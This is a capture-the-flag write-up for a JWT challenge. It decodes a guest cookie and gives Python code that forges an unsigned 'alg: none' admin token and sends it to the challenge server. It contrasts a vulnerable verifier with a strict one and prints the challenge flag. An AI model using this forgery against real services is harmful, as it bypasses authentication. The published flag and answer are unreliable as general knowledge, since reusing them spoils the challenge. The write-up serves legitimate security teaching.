
JWT - Introduction

Statement

To validate the challenge, connect as admin.

Analysis

At first look we have a login form with a "Login as guest" link. Clicking it lands on a guest page.

Checking the cookies, a new one has been added:

```
jwt: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6Imd1ZXN0In0.OnuZnYMdetcg7AWGV6WURn8CFSfas6AQej4V9M13nsk
```

Decode it with jwt.io (the header and payload are only base64url-encoded JSON, so no key is needed to read them):

HEADER

```json
{
  "typ": "JWT",
  "alg": "HS256"
}
```

PAYLOAD

```json
{
  "username": "guest"
}
```

Solution

The server trusts the `alg` field of the header. Change `alg` to `none` so that no signature is checked, change `username` to `admin`, and send the token with an empty signature segment. See CVE-2018-1000531 for a real-world instance of a JWT library accepting `alg: none` this way.

```python
import requests
import jwt  # PyJWT

URL = "http://challenge01.root-me.org/web-serveur/ch58/index.php"

# Forge an unsigned token: alg "none" takes no key and produces an empty signature.
encoded_jwt = jwt.encode({"username": "admin"}, key=None, algorithm="none")

# PyJWT 1.x returns bytes, 2.x returns str; the cookie value must be str.
if isinstance(encoded_jwt, bytes):
    encoded_jwt = encoded_jwt.decode()

# Send the forged token in the same cookie the guest login set.
response = requests.get(URL, cookies={"jwt": encoded_jwt})

print(response.text)
```
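To see what jwt.io is doing in the Analysis section and why the `alg: none` token from the Solution gets through, here is an added example (not part of the original write-up or the challenge) that decodes the guest cookie from the page, forges the unsigned admin token by hand with only the standard library, and checks it against two verifiers: one that lets the token's header pick the algorithm, and one that pins HS256 server-side. `SERVER_SECRET` is an assumption, a stand-in for the challenge's unknown key; it only serves to show that a pinned check rejects the forgery and still accepts a properly signed token.

```python
import base64
import hashlib
import hmac
import json

# The guest cookie exactly as the challenge page shows it.
GUEST_JWT = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9"
    ".eyJ1c2VybmFtZSI6Imd1ZXN0In0"
    ".OnuZnYMdetcg7AWGV6WURn8CFSfas6AQej4V9M13nsk"
)

# Assumption: a stand-in secret. The challenge's real HS256 key is unknown;
# this one only shows that a pinned HS256 check rejects the forged token.
SERVER_SECRET = b"stand-in-secret-not-the-challenge-key"


def b64url_decode(segment: str) -> bytes:
    """JWT uses base64url without padding; restore the '=' before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def decode_jwt(token: str):
    """What jwt.io shows: header and payload are plain JSON, no key needed."""
    header_b64, payload_b64, signature_b64 = token.split(".")
    return (
        json.loads(b64url_decode(header_b64)),
        json.loads(b64url_decode(payload_b64)),
        b64url_decode(signature_b64),
    )


def _segments(header: dict, payload: dict) -> str:
    """header.payload, the signing input of a JWT."""
    compact = {"separators": (",", ":")}
    return (
        b64url_encode(json.dumps(header, **compact).encode())
        + "."
        + b64url_encode(json.dumps(payload, **compact).encode())
    )


def sign_hs256(payload: dict, secret: bytes) -> str:
    """A legitimately signed token, as the server would issue it."""
    signing_input = _segments({"typ": "JWT", "alg": "HS256"}, payload)
    mac = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(mac)


def forge_none_token(payload: dict) -> str:
    """The attack: alg 'none' and an empty signature segment (trailing dot)."""
    return _segments({"typ": "JWT", "alg": "none"}, payload) + "."


def vulnerable_verify(token: str, secret: bytes):
    """Lets the token's own header choose the algorithm, so 'none' skips the MAC."""
    header_b64, payload_b64, signature_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") == "none":
        return json.loads(b64url_decode(payload_b64))  # unsigned, accepted anyway
    if header.get("alg") == "HS256":
        signing_input = f"{header_b64}.{payload_b64}".encode()
        expected = hmac.new(secret, signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(signature_b64)):
            return json.loads(b64url_decode(payload_b64))
    return None


def strict_verify(token: str, secret: bytes):
    """The fix: the server decides the algorithm and always checks the MAC."""
    header_b64, payload_b64, signature_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        return None  # 'none' in any spelling, and every other algorithm, is refused
    signing_input = f"{header_b64}.{payload_b64}".encode()
    expected = hmac.new(secret, signing_input, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(signature_b64)):
        return None
    return json.loads(b64url_decode(payload_b64))


if __name__ == "__main__":
    print(decode_jwt(GUEST_JWT)[:2])
    forged = forge_none_token({"username": "admin"})
    print(forged)
    print("vulnerable:", vulnerable_verify(forged, SERVER_SECRET))
    print("strict:", strict_verify(forged, SERVER_SECRET))
```

The forged token ends with a bare dot: the third segment is empty because there is nothing to sign. `strict_verify` never consults the header to choose the algorithm; it compares against the one the server configured and rejects anything else, which is the same fix the page's flag alludes to. The `key=None` in the PyJWT one-liner above is the library's way of producing exactly this token.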

The flag is

```
S1gn4tuR3_v3r1f1c4t10N_1S_1MP0Rt4n7
```

This post is licensed under CC BY 4.0 by the author.